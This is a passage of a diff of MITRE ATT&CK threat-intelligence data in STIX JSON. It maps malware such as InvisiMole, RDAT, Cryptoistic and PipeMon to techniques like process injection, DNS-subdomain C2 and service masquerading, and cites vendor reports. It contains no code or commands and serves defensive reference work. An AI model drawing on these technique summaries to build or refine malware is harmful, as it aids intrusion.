"malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "external_references": [ + { + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can use zlib to compress and decompress data.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--399fbffc-1684-44ef-8002-61cfeff14383", + "type": "relationship", + "modified": "2020-08-17T12:57:12.417Z", + "created": "2020-08-17T12:57:12.417Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can use Data Protection API to encrypt its components on the victim\u2019s computer, to evade detection, and to make sure the payload can only be decrypted and loaded on one specific compromised computer.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--85cff8f7-2c44-4886-8b8c-efaac50d4596", + "type": "relationship", + "modified": "2020-08-17T14:08:26.049Z", + "created": "2020-08-17T14:08:26.049Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can collect jpeg files from connected MTP devices.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--077beadb-aa94-45bd-8875-d917fcd7f6b7", + "type": "relationship", + "modified": "2020-08-17T14:08:26.102Z", + "created": "2020-08-17T14:08:26.102Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "source_name": "ESET InvisiMole June 2018" + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can collect data from the system, and can monitor changes in specified directories.(Citation: ESET InvisiMole June 2018)", + "relationship_type": "uses", + "id": "relationship--63738109-c04a-4af9-a671-636c493d7a21", + "type": "relationship", + "modified": "2020-08-17T14:08:26.114Z", + "created": "2020-08-17T14:08:26.114Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can use a modified base32 encoding to encode data within the subdomain of C2 requests.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--657cb17c-b227-4f97-a19a-e1b0fb7c839d", + "type": "relationship", + "modified": "2020-08-17T14:08:26.154Z", + "created": "2020-08-17T14:08:26.154Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can use a JavaScript file as part of its execution chain.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--7105dbb9-fcb2-41f7-a740-a19d539758fb", + "type": "relationship", + "modified": "2020-08-17T14:08:26.174Z", + "created": "2020-08-17T14:08:26.174Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "external_references": [ + { + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) InvisiMole can identify proxy servers used by the victim and use them for C2 communication.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--e3e55e40-d284-4c43-9602-145d6643bc7b", + "type": "relationship", + "modified": "2020-08-17T14:37:43.590Z", + "created": "2020-08-17T14:37:43.590Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can inject its backdoor as a portable executable into a target process.(Citation: ESET InvisiMole June 2020)\t", + "relationship_type": "uses", + "id": "relationship--0ed82dd2-9b78-49a7-990b-d59ad7fa40a1", + "type": "relationship", + "modified": "2020-08-17T14:37:43.612Z", + "created": "2020-08-17T14:37:43.612Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can inject its code into a trusted process via the APC queue.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--37da9e7e-f366-4211-84bd-34fd9c43d681", + "type": "relationship", + "modified": "2020-08-17T14:37:43.670Z", + "created": "2020-08-17T14:37:43.670Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has used Windows services as a way to execute its malicious payload.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--1b92df4d-d064-4615-b27d-cf4d53ecc97b", + "type": "relationship", + "modified": "2020-08-17T14:42:10.296Z", + "created": "2020-08-17T14:42:10.296Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can deliver trojanized versions of software and documents, relying on user execution.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--dfea2d53-ecf8-4e01-9773-98d65c57bcc8", + "type": "relationship", + "modified": "2020-08-17T14:49:06.275Z", + "created": "2020-08-17T14:49:06.275Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "external_references": [ + { + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can mimic HTTP protocol with custom HTTP \u201cverbs\u201d HIDE, ZVVP, and NOP.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--c0011483-66e7-4f74-a397-d391efc421dc", + "type": "relationship", + "modified": "2020-08-17T15:22:28.998Z", + "created": "2020-08-17T15:22:28.998Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "external_references": [ + { + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "source_name": "ESET InvisiMole June 2018" + } + ], + "description": "\n[InvisiMole](https://attack.mitre.org/software/S0260) can disconnect previously connected remote drives.(Citation: ESET InvisiMole June 2018)", + "relationship_type": "uses", + "id": "relationship--c5d67c9b-f8de-420a-ad05-3691ca001b64", + "type": "relationship", + "modified": "2020-08-17T15:22:29.072Z", + "created": "2020-08-17T15:22:29.071Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "external_references": [ + { + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", + "source_name": "ESET InvisiMole June 2018" + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can can remove all system restore points.(Citation: ESET InvisiMole June 2018)", + "relationship_type": "uses", + "id": "relationship--0e9818a5-90ec-4b12-a6e2-20188d78a69f", + "type": "relationship", + "modified": "2020-08-17T15:22:29.131Z", + "created": "2020-08-17T15:22:29.131Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has attempted to disguise itself by registering under a seemingly legitimate service name.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--ed3d84f6-542f-418b-9769-4bfd10246371", + "type": "relationship", + "modified": "2020-08-18T13:13:30.558Z", + "created": "2020-08-18T13:13:30.558Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "description": "[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability delete files from a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)", + "relationship_type": "uses", + "id": "relationship--67272019-b1e1-4c4e-8b7f-cd73b3ed6a31", + "type": "relationship", + "modified": "2020-08-18T15:36:30.833Z", + "created": "2020-08-18T15:36:30.833Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "description": "[Cryptoistic](https://attack.mitre.org/software/S0498) can retrieve files from the local file system.(Citation: SentinelOne Lazarus macOS July 2020)", + "relationship_type": "uses", + "id": "relationship--0994d9a9-b94e-4235-b762-18c2f7b2ed57", + "type": "relationship", + "modified": "2020-08-18T15:36:30.900Z", + "created": "2020-08-18T15:36:30.900Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) has used AES ciphertext to encode C2 communications.(Citation: Unit42 RDAT July 2020)", + "relationship_type": "uses", + "id": "relationship--78665233-dd3d-4a86-981f-4342e4e0cbee", + "type": "relationship", + "modified": "2020-09-02T21:40:20.930Z", + "created": "2020-08-19T17:34:47.340Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) has created a service when it is installed on the victim machine.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--61ce8307-ddb8-4f29-ab77-6532c2b90266", + "type": "relationship", + "modified": "2020-08-19T17:34:47.334Z", + "created": "2020-08-19T17:34:47.334Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) has masqueraded as VMware.exe.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--4899bf68-d60e-4132-a962-faafd35f0c4a", + "type": "relationship", + "modified": "2020-08-19T17:34:47.344Z", + "created": "2020-08-19T17:34:47.344Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) has used Windows Video Service as a name for malicious services.(Citation: Unit42 RDAT July 2020)", + "relationship_type": "uses", + "id": "relationship--240ba2e0-c718-4327-a6a6-cb35d6145c35", + "type": "relationship", + "modified": "2020-09-02T21:40:20.986Z", + "created": "2020-08-19T17:34:47.325Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via subdomains that utilize base64 with character substitutions.(Citation: Unit42 RDAT July 2020)\t", + "relationship_type": "uses", + "id": "relationship--5ef6ff08-0567-4366-a1df-13184c460cc4", + "type": "relationship", + "modified": "2020-09-02T21:40:21.006Z", + "created": "2020-08-19T17:34:47.342Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "description": "[RDAT](https://attack.mitre.org/software/S0495) can use email attachments for C2 communications.(Citation: Unit42 RDAT July 2020)", + "relationship_type": "uses", + "id": "relationship--804fb819-6b91-4295-aec9-b9299fb3472b", + "type": "relationship", + "modified": "2020-08-19T17:34:47.359Z", + "created": "2020-08-19T17:34:47.359Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", + "target_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "external_references": [ + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "url": "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + }, + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "(Citation: Symantec Dragonfly Sept 2017)(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--98159d54-7ae3-4426-b879-271fbb420b8e", + "type": "relationship", + "modified": "2020-08-20T14:41:26.722Z", + "created": "2020-08-20T14:41:26.722Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", + "target_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--497e4571-ac4f-4e6b-b303-e28be3b2e002", + "type": "relationship", + "modified": "2020-08-20T14:54:30.537Z", + "created": "2020-08-20T14:54:30.537Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317", + "target_ref": "attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "relationship_type": "mitigates", + "description": "Limit permissions to discover cloud infrastructure in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.", + "id": "relationship--00c4456d-cea9-43bf-913b-ec566699ce61", + "type": "relationship", + "modified": "2020-09-17T16:41:23.401Z", + "created": "2020-08-20T18:47:28.174Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) has stored its encrypted payload in the Registry.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--33823f15-f43f-41ef-bc14-7dea2ab21acf", + "type": "relationship", + "modified": "2020-10-05T19:54:23.011Z", + "created": "2020-08-24T13:40:23.074Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) has used call to LoadLibrary to load its installer. [PipeMon](https://attack.mitre.org/software/S0501) loads its modules using reflective loading or custom shellcode.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--f77738b8-e17c-4b6b-98fc-ffcc569cc008", + "type": "relationship", + "modified": "2020-08-24T13:40:23.150Z", + "created": "2020-08-24T13:40:23.150Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501)'s first stage has been executed by a call to CreateProcess with the decryption password in an argument. [PipeMon](https://attack.mitre.org/software/S0501) has used a call to LoadLibrary to load its installer.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--dfea8f12-5c47-4a11-a4ed-06d08192b9ab", + "type": "relationship", + "modified": "2020-09-22T14:02:02.228Z", + "created": "2020-08-24T13:40:23.207Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + 